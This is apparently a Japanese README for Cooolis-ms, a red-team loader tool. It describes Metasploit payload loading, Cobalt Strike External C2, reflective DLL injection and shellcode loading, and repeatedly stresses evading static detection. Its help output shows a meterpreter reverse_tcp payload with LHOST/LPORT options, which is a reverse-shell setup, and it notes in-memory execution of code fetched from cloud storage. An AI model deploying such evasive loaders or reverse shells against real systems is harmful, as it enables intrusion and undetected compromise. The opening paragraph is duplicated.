
Cooolis-msは、Metasploit Payload Loader、Cobalt Strike External C2 Loader、Reflective DLL injectionを含むコード実行ツールです。その目的は、静的検出を回避して、特徴のあるコードの実行を可能にし、レッドチームがWebコンテナ環境からC2環境へより迅速かつ便利に移行して作業を進められるようにすることです。

Cooolis-msは、Metasploit Payload Loader、Cobalt Strike External C2 Loader、Reflective DLL injectionを含むコード実行ツールです。その目的は、静的検知を回避し、実行しようとする特徴的なコードを一部回避することにあります。これにより、Red TeamメンバーがWebコンテナ環境からC2環境へ、より迅速かつ容易に移行できるようになります。
git clone https://github.com/Rvn0xsy/Cooolis-msCooolis-msは、Metasploit API ドキュメントを参考にRPCサービスクライアント機能を実装しており、Cooolis-msのサーバーが任意のペイロードを送信できるため、柔軟性が向上しています。Cooolis-msは、MemoryModuleを参考にPEのロードを実装しており、実行時の特徴を減らし、検出率を低下させています。Cooolis-msは、ReflectiveDLLInjectionを参考にリフレクティブDLLのロード実行とインジェクションを実装しており、実行時の特徴を減らし、検出率を低下させています。Cooolis-msは、External C2 (Third-party Command and Control)を参考に基本的なExternal C2実行を実装しており、実行時の特徴を減らし、検出率を低下させています。Cooolis-msは、Aliyun OSSサーバー上のファイルを実行コードとして使用し、自動的にメモリにロードして実行することも考慮しており、柔軟性がさらに向上しています。現在、Cooolis-msには以下のサブコマンドがあります:
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe -h
Version v1.2.6
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe [OPTIONS] SUBCOMMAND
Options:
-h,--help Print this help message and exit
Subcommands:
metasploit Metasploit RPC Loader
cobaltstrike Cobalt Strike External C2 Loader
reflective Reflective DLL injection
shellcode Shellcode Loader
サブコマンドの後に-h/--helpを追加することで、対応する詳細パラメータを取得できます:
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe metasploit -h
Metasploit RPC Loader
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe metasploit [OPTIONS]
Options:
-h,--help Print this help message and exit
-p,--payload TEXT=windows/meterpreter/reverse_tcp
Payload Name, e.g. windows/meterpreter/reverse_tcp
-o,--options TEXT Payload options, e.g. LHOST=1.1.1.1,LPORT=8866
-P,--PORT UINT:INT in [1 - 65535]=8899 REQUIRED
RPC Server Port
-H,--HOST TEXT:IPV4 REQUIRED
RPC Server Host
こちらを参考にして、自身の優れたプロジェクトを作成することができます。
このプロジェクトが気に入ったら、Starをよろしくお願いします~